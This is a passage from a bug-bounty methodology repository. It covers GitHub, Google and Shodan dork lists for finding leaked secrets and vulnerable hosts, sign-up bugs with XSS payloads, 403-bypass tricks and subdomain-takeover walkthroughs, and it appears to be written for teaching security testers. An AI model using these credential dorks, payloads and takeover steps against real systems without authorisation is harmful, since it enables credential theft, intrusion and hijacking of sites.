136 | * [Password_Reset_Flaws](./Password_Reset_Functionality/Password_Reset_Flaws_by_Sm4rty.md)
137 |   
138 | ### Rate Limit
139 | 
140 | * [Rate Limit Flaws](./Rate_limit/README.md)
141 | * [Rate-Limit Bypass](./Rate_limit/RateLimitBypass.md)
142 | * [No Rate-Limit on Verify-PhoneNo](./Rate_limit/No%20Rate-Limit%20on%20Verify-PhoneNo.md)
143 | * [No Rate-limit on Invite User](./Rate_limit/No%20Rate-limit%20on%20Invite%20User.md)
144 | * [No Rate-limit on Promo](./Rate_limit/No%20Rate-limit%20on%20Promo.md)
145 | * [No Rate-limit on Verify-email](./Rate_limit/No%20Rate-limit%20on%20Verify-email.md)
146 | * [No Rate-limit on forget-password](./Rate_limit/No%20Rate-limit%20on%20forget-password.md)
147 | 
148 |   
149 | ### Race Condition
150 | 
151 | * [Race Condition](./Race_Condition/race_conditions.md)
152 | 
153 | ### Recon
154 | 
155 | * [Github](./Recon/Github_Dorking.md)
156 | * [Recon Workflow](./Recon/Workflow.md)
157 | * [Subdomain Enumeration](./Recon/subdomain_enumeration.md)
158 | 
159 | ### SQLi
160 | 
161 | * [SQL Injection.md](./SQLi/SQL_Injection.md)
162 | 
163 | ### SAML
164 | 
165 | * [SAML](./SAML/SAML.md)
166 | 
167 | ### SSRF
168 | 
169 | * [SSRF](./SSRF/SSRF.md)
170 | * [Blind SSRF](./SSRF/Blind_SSRF.md)
171 | 
172 | ### SSTI
173 | 
174 | * [SSTI](./SSTI/SSTI.md)
175 | 
176 | ### Sign Up Functionality
177 | 
178 | * [Sign Up Bugs](./Sign_Up_Functionality/Hunting_for_bugs_in_signup_feature.md)
179 | * [Sign Up MindMap](./Sign_Up_Functionality/Signup_Mindmap.png)
180 | 
181 | ### Sensitive Info Leaks
182 | 
183 | * [Github Recon Method](./Sensitive_Info_Leaks/Github_Recon_Method.md)
184 | * [Github-Dorks](./Sensitive_Info_Leaks/Github-dorks.md)
185 | * [Github Dorks All](./Sensitive_Info_Leaks/Github_dorks_all.md)
186 | * [Google Dorks ](./Sensitive_Info_Leaks/Google_Dorks.md)
187 | * [Shodan CVE Dorks](./Sensitive_Info_Leaks/Shodan_cve_dorks.md)
188 | * [Version Leaks](./Sensitive_Info_Leaks/Version_Leak.md)
189 | 
190 | ### Status Code Bypass
191 | 
192 | * [Status_Code_Bypass Tips](./Status_Code_Bypass/README.md)
193 | * [403 Bypass](./Status_Code_Bypass/403Bypass.md)
194 | 
195 | ### Subdomain Takeover
196 | 
197 | * [Subdomain Takeover - Detail Method](./Subdomain_Takeover/Subdomain_Takeover.md)
198 | * [Subdomain Takeover - Easy Method](./Subdomain_Takeover/Easy_Methods.md)
199 | * [Subs or Top level Domain](./Subdomain_Takeover/Sub_or_top_level_domain_takeover.md)
200 |   
201 | ### Tabnabbing
202 | 
203 | * [Tabnabbing](./Tabnabbing/Tabnabbing.md)
204 | 
205 | ### WAF Bypasses
206 | 
207 | * [WAF Bypass Using Headers](./WAF_Bypasses/WAF_Bypass_Using_headers.md)
208 | 
209 | ### Weak Password Policy
210 | 
211 | * [Weak Password Policy](./Weak_Password_Policy/Weak_password_policy.md)
212 | 
213 | ### XSS
214 | 
215 | * [XSS](./XSS/Xss.md)
216 | * [Bypass CSP](./XSS/Bypass_CSP.md)
217 | * [XSS Bypass](./XSS/XSS_Bypass.md)
218 | * [Automated XSS](./XSS/Automated_XSS.md)
219 | * [Post Message Xss](./XSS/post_message_xss.md)
220 | 
221 | ### XXE
222 | 
223 | * [XXE Methods](./XXE/XXE_Methods.md)
224 | * [Billion Laugh Attack](./XXE/Billion_Laugh_Attack.md)
225 | 
226 | 


--------------------------------------------------------------------------------
/Sensitive_Info_Leaks/Github-dorks.md:
--------------------------------------------------------------------------------
  1 | **GitHub Dork List :**
  2 | 
  3 | **GitHub Dorks for Finding Files**
  4 | 
  5 | - filename:manifest.xml
  6 | - filename:travis.yml
  7 | - filename:vim_settings.xml
  8 | - filename:database
  9 | - filename:prod.exs NOT prod.secret.exs
 10 | - filename:prod.secret.exs
 11 | - filename:.npmrc _auth
 12 | - filename:.dockercfg auth
 13 | - filename:WebServers.xml
 14 | - filename:.bash_history <Domain name>
 15 | - filename:sftp-config.json 
 16 | - filename:sftp.json path:.vscode
 17 | - filename:secrets.yml password
 18 | - filename:.esmtprc password
 19 | - filename:passwd path:etc
 20 | - filename:dbeaver-data-sources.xml
 21 | - path:sites databases password
 22 | - filename:config.php dbpasswd
 23 | - filename:prod.secret.exs
 24 | - filename:configuration.php JConfig password
 25 | - filename:.sh_history
 26 | - shodan_api_key language:python
 27 | - filename:shadow path:etc
 28 | - JEKYLL_GITHUB_TOKEN
 29 | - filename:proftpdpasswd
 30 | - filename:.pgpass
 31 | - filename:idea14.key
 32 | - filename:hub oauth_token
 33 | - HEROKU_API_KEY language:json
 34 | - HEROKU_API_KEY language:shell
 35 | - SF_USERNAME salesforce
 36 | - filename:.bash_profile aws
 37 | - extension:json [api.forecast.io](http://api.forecast.io/)
 38 | - filename:.env MAIL_HOST=[smtp.gmail.com](http://smtp.gmail.com/)
 39 | - filename:wp-config.php
 40 | - extension:sql mysql dump
 41 | - filename:credentials aws_access_key_id
 42 | - filename:id_rsa or filename:id_dsa
 43 | 
 44 | ----------
 45 | 
 46 | 
 47 | **GitHub Dorks for Finding Languages**
 48 | 
 49 |  - language:python username
 50 |  - language:php username
 51 |  - language:sql username
 52 |  - language:html password
 53 |  - language:perl password
 54 |  - language:shell username
 55 |  - language:java api
 56 |  - HOMEBREW_GITHUB_API_TOKEN language:shell
 57 | 
 58 | ------
 59 | 
 60 | 
 61 | **GiHub Dorks for Finding API Keys, Tokens and Passwords**
 62 | 
 63 | - api_key
 64 | - “api keys”
 65 | - authorization_bearer:
 66 | - oauth
 67 | - auth
 68 | - authentication
 69 | - client_secret
 70 | - api_token:
 71 | - “api token”
 72 | - client_id
 73 | - password
 74 | - user_password
 75 | - user_pass
 76 | - passcode
 77 | - client_secret
 78 | - secret
 79 | - password hash
 80 | - OTP
 81 | - user auth
 82 | 
 83 | 
 84 | -----
 85 | 
 86 | **GitHub Dorks for Finding Username**s
 87 | 
 88 | - user:name (user:admin)
 89 | - org:name (org:google type:users)
 90 | - in:login (<username> in:login)
 91 | - in:name (<username> in:name)
 92 | - fullname:firstname lastname (fullname:<name> <surname>)
 93 | - in:email (data in:email)
 94 | - GitHub Dorks for Finding Information using Dates
 95 | - created:<2012–04–05
 96 | - created:>=2011–06–12
 97 | - created:2016–02–07 location:iceland
 98 | - created:2011–04–06..2013–01–14 <user> in:username
 99 | 
100 | -----
101 | 
102 | **GitHub Dorks for Finding Information using Extension**
103 | 
104 | - extension:pem private
105 | - extension:ppk private
106 | - extension:sql mysql dump
107 | - extension:sql mysql dump password
108 | - extension:json [api.forecast.io] (http://api.forecast.io/)
109 | - extension:json [mongolab.com] (http://mongolab.com/)
110 | - extension:yaml [mongolab.com] (http://mongolab.com/)
111 | - [WFClient] Password= extension:ica
112 | - extension:avastlic “[support.avast.com] (http://support.avast.com/)”
113 | - extension:json googleusercontent client_secret
114 | 


--------------------------------------------------------------------------------
/Sensitive_Info_Leaks/Github_Recon_Method.md:
--------------------------------------------------------------------------------
 1 | # Github Recon
 2 | Using Github we can find sensitive infos.
 3 | 
 4 | ## Steps:
 5 | 
 6 | 1. Check github with company name for API keys or passswords.
 7 | 2. Enumerate the employees of the company from linkedin and twitter and check their repositories on github for sensitive information.
 8 | 3. Check source code of main website and subdomains for github links in the html comments or anywhere. Search using ctl-F and search for keyword github
 9 | 
10 | ## Tools and references::
11 | * https://github.com/BishopFox/GitGot
12 | * https://github.com/hisxo/gitGraber
13 | * https://github.com/tillson/git-hound
14 | * https://securitytrails.com/blog/github-dorks
15 | 
16 | ## Reports (Hackerone)
17 | 
18 | ### Resolved
19 | 
20 | - [Important information leaked on Github](https://hackerone.com/reports/649322)
21 | - [Github Token Leaked publicly for https://github.com/mopub](https://hackerone.com/reports/612231)
22 | - [CircleCI token in github repo allows for access to sensitive build information](https://hackerone.com/reports/858915)
23 | - [Information Leak - Github - JMS Information](https://hackerone.com/reports/360811)
24 | - [Leaked artifactory_key, artifactory_api_key, and gcloud refresh_token via GitHub.](https://hackerone.com/reports/496414)
25 | - [Github Token Leaked publicly for https://github.sc-corp.net](https://hackerone.com/reports/396467)
26 | 
27 | ## Author:
28 | * [@0xCCFFF](https://twitter.com/0xCCFFF) (MadMaxx)
29 | * [@klaus](https://twitter.com/klaus_dev)
30 | 


--------------------------------------------------------------------------------
/Sensitive_Info_Leaks/Google_Dorks.md:
--------------------------------------------------------------------------------
 1 | ### Google Dorks to find Juicy Content
 2 | 
 3 | `inurl:example.com intitle:"index of"` <br>
 4 | `inurl:example.com intitle:"index of /" "*key.pem"` <br>
 5 | `inurl:example.com ext:log` <br>
 6 | `inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv` <br>
 7 | `inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git` <br>
 8 | `inurl:example.com intitle:"index of" "config.db"` <br>
 9 | `inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml` <br>
10 | `inurl:example.com intext:admin ext:sql inurl:admin` <br>
11 | `inurl:example.com allintext:username,password filetype:log` <br>
12 | `site:example.com "-----BEGIN RSA PRIVATE KEY-----" inurl:id_rsa`<br>
13 | `site:*.gov.* "responsible disclosure"`<br>
14 | 
15 | ![t](https://miro.medium.com/max/550/1*N9W6DfGA6wxgKTiywV9aUA.png) <br>
16 | 
17 | 
18 | [Refrence](https://blog.usejournal.com/how-recon-helped-samsung-protect-their-production-repositories-of-samsungtv-ecommerce-estores-4c51d6ec4fdd)
19 | 
20 | 
21 | #### Other than Google, Try these dorks on various Search Engines such as Duck Duck Go, Bing etc.
22 | 
23 | ## Reports (Hackerone)
24 | 
25 | ### Resolved
26 | 
27 | - [Securing "Reset password" pages from bots](https://hackerone.com/reports/43807)
28 | - [Private Grab Messages on Android App can be accessed and cached by Search Engines](https://hackerone.com/reports/221558)
29 | 
30 | ### Informative
31 | 
32 | - [Information disclosure through search engines (password reset token)](https://hackerone.com/reports/322988)
33 | 
34 | ### N/A
35 | 
36 | - [Research papers on yelp are getting indexed by google bots.](https://hackerone.com/reports/207435)
37 | 
38 | 
39 | Author 
40 | - [Keshav Malik](twitter.com/g0t_rOoT_) <br>
41 | - [Naveen Prakaasham](twitter.com/NPrakaasham) <br>
42 | - [@klaus](https://twitter.com/klaus_dev)
43 | - [Fani Malik](https://twitter.com/fanimalikhack)
44 | 


--------------------------------------------------------------------------------
/Sensitive_Info_Leaks/Shodan_cve_dorks.md:
--------------------------------------------------------------------------------
 1 | ## CVE's Shodan Dorks.
 2 | 
 3 | * Big IP shodan Search:- 
 4 | 
 5 | `http.title:"BIG-IP&reg;-Redirect" org:Org`
 6 | 
 7 | * CVE 2020-3452
 8 |  
 9 | ` http.html_hash:-628873716 
10 | “set-cookie: webvpn;”` 
11 | 
12 | * CVE CVE-2019-11510
13 | 
14 | `http.html:/dana-na/`  
15 | 
16 | * CVE-2020–5902
17 |  
18 |  ```inurl:/tmui/login.jsp```
19 | 
20 | 
21 | ## Author:
22 | - [@manasH4rsh](https://twitter.com/manasH4rsh)
23 | - [Fani Malik](https://twitter.com/FaniMalikHack)
24 | 


--------------------------------------------------------------------------------
/Sensitive_Info_Leaks/Version_Leak.md:
--------------------------------------------------------------------------------
 1 | # Version Leak
 2 | 
 3 | ```
 4 | step1. go to the target says- https://redacted.com
 5 | step2. open view page source
 6 | step3. check for path, directories
 7 | step4. go that path says- https://redacted.com/theme/css/file.css
 8 | step5. try to visit all directories and check it is accessible or not.
 9 | step5. if it is give 403
10 | step6. add %0, %m, %2e, says- https://redacted.com/%0theme and then check the response, it will show the running server name, and version information.
11 | ```
12 | - And check for also css path url, sometime it contain some path.
13 | 


--------------------------------------------------------------------------------
/Sign_Up_Functionality/Hunting_for_bugs_in_signup_feature.md:
--------------------------------------------------------------------------------
  1 | ### Implementing the Sign Up Feature:
  2 | 
  3 | We will take the example of a School Website(**school.org**) to learn the implementation of Sign Up Feature:  
  4 | In this Example, The Students need to register to **school.org** for accessing their Academic educational resource. Users of **school.org** must have the ability to register as a member thus gaining access to the content of the site.
  5 | 
  6 | So, The Signup process can be implemented by school in two ways:
  7 | 
  8 | 1.  **Manual Signup** — Registration based on user providing a series of specific user information. It usually includes form like name, email, password, confirm password, etc. as shown in image below.
  9 | 
 10 | 
 11 | 2.  **Social Signup** **/OAuth**— Registration via an integrated social media source via social media platform like _Facebook_, _Twitter_, or _Google_, the user can sign into a third party website instead of creating a new account specifically for that website.
 12 | 
 13 | In this Blog I will be talking about Bugs in Manual Sign up. Lets have Social Signup/ OAuth for our next blog topic.
 14 | 
 15 | ### Exploiting Signup Feature:
 16 | 
 17 | #### 1\. Duplicate registration / Overwrite existing user.
 18 | 
 19 | Duplicate registration is when an application allows us to register or sign up with the same email address, username or phone number. It can have critical consequences based on what kind of attack is performed.
 20 | 
 21 | **_Steps to reproduce:_**
 22 | 
 23 | 1) Create first account in application with email say [abc@gmail.com](mailto:abc@gmail.com) and password.  
 24 | 2) Logout of the account and create another account with same email and different password.  
 25 | 3) You can even try to change email case in some case like from [abc@gmail.com](mailto:abc@gmail.com) to [Abc@gmail.com](mailto:Abc@gmail.com)  
 26 | 4) Finish the creation process — and see that it succeeds  
 27 | 5) Now go back and try to login with email and the new password. You are successfully logged in.
 28 | 
 29 | > **Further Read**  
 30 | >  [https://hackerone.com/reports/187714](https://hackerone.com/reports/187714)  
 31 | >  [https://shahjerry33.medium.com/duplicate-registration-the-twinning-twins-883dfee59eaf](https://shahjerry33.medium.com/duplicate-registration-the-twinning-twins-883dfee59eaf)  
 32 | >  [https://blog.securitybreached.org/2020/01/22/user-account-takeover-via-signup-feature-bug-bounty-poc/](https://blog.securitybreached.org/2020/01/22/user-account-takeover-via-signup-feature-bug-bounty-poc/)
 33 | 
 34 | #### 2\. DOS at Name/Password field in Signup Page.
 35 | 
 36 | By sending a very long string (100000 characters) it’s possible to cause a denial a service attack on the server. This may lead to the website becoming unavailable or unresponsive. Usually this problem is caused by a vulnerable string hashing implementation. When a long string is sent, the string hashing process will result in CPU and memory exhaustion.
 37 | 
 38 | **_Steps to reproduce:_**
 39 | 
 40 | 1) Go Sign up form.  
 41 | 2) Fill the form and enter a long string in password  
 42 | 3) Click on enter and you’ll get 500 Internal Server error if it is vulnerable.
 43 | 
 44 | > Further Read  
 45 | >  [https://shahjerry33.medium.com/long-string-dos-6ba8ceab3aa0](https://shahjerry33.medium.com/long-string-dos-6ba8ceab3aa0)  
 46 | >  [https://hackerone.com/reports/738569](https://hackerone.com/reports/738569)  
 47 | >  [https://hackerone.com/reports/223854](https://hackerone.com/reports/223854)
 48 | 
 49 | #### 3\. Cross-Site Scripting (XSS) in username, account name for registration.
 50 | 
 51 | **Cross-site Scripting** (**XSS**) is a security vulnerability usually found in websites and/or web applications that accept user input. This injects the malicious code into the targeted website’s content, making it a part of the website and thus allowing it to affect victims who may visit or view that website.
 52 | 
 53 | Now, for testing Signup page for XSS we can simply insert XSS payoad in fields like: username, email, password,etc.
 54 | 
 55 | Payload for Username field : **<svg/onload=confirm(1)>**  
 56 | Payload for Email field : **“><svg/onload=confirm(1)>”@x.y**
 57 | 
 58 | > Further Read  
 59 | >  [https://hackerone.com/reports/196989](https://hackerone.com/reports/196989)  
 60 | >  [https://hackerone.com/reports/470206](https://hackerone.com/reports/470206)  
 61 | >  [https://hackerone.com/reports/119090](https://hackerone.com/reports/119090)
 62 | 
 63 | #### 4\. No Rate Limit at Signup Page.
 64 | 
 65 | A **rate limiting** algorithm is used to check if the user session (or IP address) has to be **limited** based on the information in the session cache. Testing for Rate limit at Signup page is quite a good idea.
 66 | 
 67 | The Impact can be explained very well. If there is no rate limiting on signup page a malicious users can generate hundreds and thousands of fake accounts that lead to fill the application DataBase with fake accounts, Which can impact the business in many ways.
 68 | 
 69 | You can easily test for it with Burp Intruder.  
 70 | 1\. Capture the signup request and send it to Intruder.  
 71 | 2\. Add different emails as payload .  
 72 | 3\. Fire up Intruder, And check whether it returns 200 OK.
 73 | 
 74 | 
 75 | > Further Read  
 76 | >  [https://hackerone.com/reports/905692](https://hackerone.com/reports/905692)  
 77 | >  [https://hackerone.com/reports/97609](https://hackerone.com/reports/97609)  
 78 | >  [https://hackerone.com/reports/262830](https://hackerone.com/reports/262830)
 79 | 
 80 | #### 5\. Insufficient Email Verification.
 81 | 
 82 | Insufficient Email Verification means the application doesn’t verify the email id or the verification mechanism is too weak to be bypassed. You can easily Bypass Email Verification with some of the following common methods like:
 83 | 
 84 | 1.  Forced Browsing. (directly navigating to files which comes after verifying the email)
 85 | 2.  Response or Status Code Manipulation. (Replacing the bad response status like 403 to 200 can be useful)
 86 | 3.  There are much more ways of bypassing . **Tip**: Just google it.
 87 | #### Email verification bypass after signup:-
 88 | 
 89 | ```
 90 | 1. Sing up on the web application as attacker@mail.com
 91 | 2. You will receive a confirmation email on attacker@mail.com, do not open that link now.
 92 | 3. The application may ask for confirming your email, check if it allows navigating to account settings page.
 93 | 4. On settings page check if you can change the email.
 94 | 5. If allowed, change the email to victim@mail.com.
 95 | 6. Now you will be asked to confirm victim@mail.com by opening the confirmation link received on victim@mail.com, insted of opening the new link go to attacker@mail.com inbox and open the previous received link.
 96 | 7. If the application verifies vitim@mail.com by using perivious verification link received on attacker mail, then this is a email verification bypass. 
 97 | ```
 98 | > Further Read  
 99 | >  [https://hackerone.com/reports/1040047](https://hackerone.com/reports/1040047)  
100 | >  [https://hackerone.com/reports/617896](https://hackerone.com/reports/617896)  
101 | >  [https://hackerone.com/reports/737169](https://hackerone.com/reports/737169)
102 | 
103 | #### 6\. Path Overwrite
104 | 
105 | If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: `index.php`, now upon visiting target.tld/index.php, your profile will comeup and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username `login.php`, Imagine login page getting takeovered.
106 | 
107 | > Further Read:
108 | https://infosecwriteups.com/logical-flaw-resulting-path-hijacking-dd4d1e1e832f
109 |   
110 | **_Thanks for Reading. Any Suggestions are always welcomed!!_**
111 | 
112 | ## Sources:-
113 | 
114 | + https://twitter.com/kushagrasarathe/status/1385111472385060867?s=19
115 | 
116 | ## Author:-
117 | 
118 | + @Kushagra Sarathe - [Twitter](https://twitter.com/kushagrasarathe) & [GitHub](https://github.com/kushagrasarathe)
119 | + @Sm4rty - [Twitter](https://twitter.com/Sm4rty\_)  , [LinkedIn](https://www.linkedin.com/in/sm4rty) &  [Instragram](https://www.instagram.com/sm4rty)
120 | 


--------------------------------------------------------------------------------
/Sign_Up_Functionality/Signup_Mindmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/Sign_Up_Functionality/Signup_Mindmap.png


--------------------------------------------------------------------------------
/Status_Code_Bypass/403Bypass.md:
--------------------------------------------------------------------------------
 1 | ## 403 Bypass
 2 | I am sharing all this tips and techniques from my own personal experience there no official references for that
 3 | 
 4 | ### Directory Based
 5 | If you see directory with no slash at end then do these acts there
 6 | ```
 7 | site.com/secret => 403
 8 | site.com/secret/* => 200
 9 | site.com/secret/./ => 200
10 | ```
11 | ### File Base
12 | If you see file without any slash at end then do these acts there
13 | ```
14 | site.com/secret.txt => 403
15 | site.com/secret.txt/ => 200
16 | site.com/%2f/secret.txt/ => 200
17 | ```
18 | ### Protocol Base
19 | Well, sound wired but check out the example for better understanding
20 | ```
21 | https://site.com/secret => 403
22 | http://site.com/secret => 200
23 | ```
24 | ## Payloads
25 | ```
26 | /
27 | /*
28 | /%2f/
29 | /./
30 | ./.
31 | /*/
32 | ```
33 | ### Header
34 | [https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/](https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/)
35 | ```
36 | X-Forwarded-For: 127.0.0.1
37 | ```
38 | 
39 | ### Tools
40 | Here is a Tool I found on twitter.
41 | * [https://github.com/yunemse48/403bypasser](https://github.com/yunemse48/403bypasser)
42 | * [https://github.com/Dheerajmadhukar/4-ZERO-3](https://github.com/Dheerajmadhukar/4-ZERO-3)
43 | 
44 | ## Proof Of Concept
45 | Well Always look for some references or proof of concept if someone sharing any tips so you may confirm you are not wasting your time at all.
46 | I have some poc video on my YouTube channel for 403 and other Improper access control bugs with those methods. You can check them
47 | 
48 | YouTube: [Mehedi Hasan Remon](https://www.youtube.com/channel/UCF_yxU7acxUojiGiOAMafQQ/videos?view_as=subscriber)
49 | 
50 | Author:[@remonsec](https://twitter.com/remonsec)
51 |        [@KathanP19](https://twitter.com/KathanP19)
52 | 


--------------------------------------------------------------------------------
/Status_Code_Bypass/README.md:
--------------------------------------------------------------------------------
 1 | # Some Mind Maps
 2 | --------
 3 | ### 403 Mindmap
 4 | ![https://pbs.twimg.com/media/EWmW9-tWkAA4vLs?format=jpg&name=900x900](https://pbs.twimg.com/media/EWmW9-tWkAA4vLs?format=jpg&name=900x900)
 5 | 
 6 | ### Source 
 7 | * [https://twitter.com/hackerscrolls/status/1254701239360720900](https://twitter.com/hackerscrolls/status/1254701239360720900)
 8 | ---
 9 | ### Few Twitter Tips
10 | ![https://pbs.twimg.com/media/EheFZJvVgAEuzZ1?format=png&name=small](https://pbs.twimg.com/media/EheFZJvVgAEuzZ1?format=png&name=small)
11 | * [https://twitter.com/iam_j0ker/status/1303658167205728256](https://twitter.com/iam_j0ker/status/1303658167205728256)
12 | ---
13 | ### Few More Twitter Tips
14 | ![https://pbs.twimg.com/media/EkezB9QW0AAKa-Y?format=jpg&name=medium](https://pbs.twimg.com/media/EkezB9QW0AAKa-Y?format=jpg&name=medium)
15 | ![https://pbs.twimg.com/media/EkezB9VXUAYttBU?format=jpg&name=large](https://pbs.twimg.com/media/EkezB9VXUAYttBU?format=jpg&name=large)
16 | ![https://pbs.twimg.com/media/EkezB9LX0AA8DET?format=jpg&name=large](https://pbs.twimg.com/media/EkezB9LX0AA8DET?format=jpg&name=large)
17 | * [https://twitter.com/h4x0r_dz/status/1317218511937261570](https://twitter.com/h4x0r_dz/status/1317218511937261570)
18 | ---
19 | ### Author
20 | * [KathanP19](https://twitter.com/KathanP19)
21 | 


--------------------------------------------------------------------------------
/Subdomain_Takeover/Easy_Methods.md:
--------------------------------------------------------------------------------
 1 | #  1. Method by [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
 2 | Easy Subdomain Takeover Method
 3 | ```
 4 | Step:
 5 | 
 6 | 1:Grab all subdomains of target. i.e, subfinder -d flaws.cloud | tee -a domains.txt
 7 | 			
 8 | 2:Run this one liner
 9 | 			
10 | 3:cat domains.txt | while read domain;do dig  $domain;done | tee -a digs.txt
11 | 			
12 | 4::Grab all the CNAME Entries i.e, cat digs.txt | grep CNAME
13 | 			
14 | 5:Find a domain that is pointed to third party domain like sub.exampple.com CNAME x.aws.com
15 | 			
16 | 6:Check wheather the main subdomain is down
17 | 			
18 | 7:Go to host provider where the domain is pointed to and register that domain if you registered congrats you have takeover the subdomain.
19 | 			
20 | ```
21 | 
22 | # 2. Method by [@WhoIs1nVok3r](https://twitter.com/WhoIs1nVok3r)
23 | ```
24 | Step-1:- First of all collect all subdomain of the target using assetfinder,subfinder,chaos(needs API key).
25 | 
26 | Step-2:- Next sort out duplicate URLs using -- cat unresolved | sort -u | tee -a resolved
27 | 
28 | Step-3:- Pass it to subzy,subjack or other subdomain-takeover tool -- using subzy tool  --  subzy -targets resolved , or use subjack
29 | 
30 | Step-4:- We can also use nuclei templates but we need to first use httpx -- cat resolved | httpx | tee -a hosts
31 | 
32 | Step-5:- Next use nuclei-templates -- cat hosts | nuclei -t nuclei-templates/vulnerabilites -o nuclei.txt -v 
33 | 
34 | Tools Used:-
35 | 
36 | https://github.com/projectdiscovery/nuclei
37 | https://github.com/projectdiscovery/subfinder
38 | https://github.com/projectdiscovery/httpx
39 | https://github.com/projectdiscovery/nuclei-templates
40 | https://github.com/projectdiscovery/chaos-client
41 | https://github.com/haccer/subjack
42 | https://github.com/LukaSikic/subzy
43 | ```
44 | 
45 | ## Author 
46 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
47 | * [@WhoIs1nVok3r](https://twitter.com/WhoIs1nVok3r)
48 | 


--------------------------------------------------------------------------------
/Subdomain_Takeover/Sub_or_top_level_domain_takeover.md:
--------------------------------------------------------------------------------
 1 | # Subs or Top level Domain
 2 | 
 3 | - CNAME Record 0r A Record —> Points to third party services
 4 | 
 5 | - Check:
 6 | ```
 7 |      for take-overs is to query a list of domains and check for any that are either:
 8 | 
 9 |     1. attached to a third party domain or destination via the use of a cname record 
10 | 
11 |     2.return a 404 not found error.
12 | 
13 |     example : domain that resolved to a CloudFront domain which gave the following error: "Error the request could not be satisfied, generated by CloudFront (CloudFront)"
14 | ```
15 | ### Technical Detail
16 | 
17 | - This attack vector utilizes DNS entries pointing to Service Providers where the pointed subdomain is currently not in use
18 | - Service providers : 
19 | ```
20 |     Heroku, Github, Bitbucket, Squarespace, Shopify, Desk, Teamwork, Unbounce, Helpjuice, HelpScout, Pingdom, Tictail, Campaign Monitor, CargoCollective, [StatusPage.io](http://statuspage.io/) and Tumblr.
21 | ```
22 | ### Impact
23 | 
24 | - Attacker can now build a complete clone of the real site, add a login form, redirect the user, steal credentials (e.g. admin accounts), cookies and/or completely destroy business credibility for your company.
25 | - Another senario:
26 | ```
27 |     1. A Domain Owner points their * (wildcard) DNS-entry to e.g. Heroku.
28 |     2. They forget to add the wildcard-entry to their Heroku-app.
29 |     3. Attacker can now claim any subdomain they want from the Domain Owner.
30 |     4. A Domain Owner will be unaware of the subdomain being exploited.
31 | ```
32 | - In the not so rare case, the attacker can also “inherit” the Domain Owner’s Wildcard SSL used inside the Service Provider.
33 | 
34 | ### Exploit
35 | 
36 | - Claim CloudFront:
37 | ```
38 |     Singup to AWS —> head over CloudFront signup
39 | ```
40 | ### Remediation
41 | ```
42 |     - Check your DNS-configuration for subdomains pointing to services not in use.
43 |     - Set up your external service so it fully listens to your wildcard DNS. In Heroku’s case, this means running the following command in your App: heroku domains:add *.[example.com](http://example.com/)
44 | ```
45 | ### Reference
46 | - Detectify article :[https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/](https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/)
47 | - Zsec Blog: [https://blog.zsec.uk/subdomainhijack/](https://blog.zsec.uk/subdomainhijack/)
48 | 
49 | ### POC
50 | ```
51 | - I found a website, for now call it [www.target.com](http://www.target.com)  
52 | - I went to terminal and run a host command on that target
53 | 
54 | host www.target.com
55 | 
56 | - it was pointing its 'A' record to  23.227.38.65 this IP 
57 | - Now i knew that this IP belongs to shopify cause i had setup a shop on shopify few days back (you can also go and check with whois record for this ip)
58 | - I opened the website [www.target.com](http://www.target.com) , I found there shopify template stating  "only one step left to finish setting" (In some cases : it also state Sorry this shop is unavailable) 
59 | - Now i knew what i have to do, i sing-up on shopify with trial account, after that i put the same target website name, it gave me error stating application name already exist, so put target.com as a name, finally it was created.
60 | - I went to setting, it shows me two option "connect your domain automatically" and "connect you domain manually"
61 | - I choose first one automatic one, just put that domain [www.target.com](http://www.target.com) , it got connected. We are done, now we owns this top level domain.
62 | ```
63 | ### Analysis
64 | ```
65 | - The person registered this domain name from godaddy , and configured its DNS record pointing to shopify IP
66 | - Either he might had forgotten to create a shop or he had created a shop used it for a while then deleted that shop from shopify but didn't removed the DNS entry pointing to shopify's IP
67 | ```
68 | 
69 | ** Pardon for any spelling or grammar mistake **
70 | 
71 | ### Author:
72 | - Twitter Id: @Zero0x00
73 | 


--------------------------------------------------------------------------------
/Subdomain_Takeover/Subdomain_Takeover.md:
--------------------------------------------------------------------------------
 1 | # Subdomain Takeover
 2 | 
 3 | ## Basics
 4 | 
 5 | ### DNS
 6 | ![DNS](dns.png)
 7 | * When a web address is accessed eg. "www.xyz.com", a DNS query is performed across a DNS server with the host name.
 8 | * The DNS server takes the hostname and resolves it into a numeric IP address 
 9 | 
10 | ### CNAME
11 | ![CNAME](cname.png)
12 | * An alias of domain name to another domain name
13 | * In the example below, xyz.company.com is a source domain and xyz.cloudservice.com is a canonical domain name.
14 | 
15 | 
16 | 
17 | 
18 | 
19 | ![Subtakeover_basics](subdomain_takeover.png)
20 | 
21 | * Subdomains map themselves to a specific IP, 3rd party services like Azure, AWS, Heroku, Github, Fastly, Shopify, etc. to serve the contents. These subdomains use a CNAME record to another domain [eg. xyz.company.com CNAME xyz.cloudservice.com]
22 | * Now due to whatever reason, the company decides to stop utilizing this service and to save some bucks, the company cancels the subscription of the 3rd party cloud service provider.
23 | * But, the company forgets to update or simply remove the CNAME record in the DNS zone file
24 | * Since the CNAME record is not deleted from company.com DNS zone, anyone who registers xyz.cloudservice.com has full control over xyz.company.com until the DNS record is present.
25 | 
26 | ## How to find subdomain takeover ?
27 | 
28 | ### 1. Subdomain Enumeration
29 | Use the following tools to enumerate subdomains
30 | * [Assetfinder](https://github.com/tomnomnom/assetfinder)
31 | * [Subfinder](https://github.com/projectdiscovery/subfinder)
32 | * [Findomain](https://github.com/Edu4rdSHL/findomain)
33 | 
34 | ### 2. Checking for takeover
35 | The following tools are designed to scan a list of subdomains concurrently and identify ones that are able to be hijacked.
36 | * [Subjack](https://github.com/haccer/subjack)
37 | * [SubOver](https://github.com/Ice3man543/SubOver)
38 | 
39 | You can also verify if the subdomain is vulnerable or not by going through common error pages.
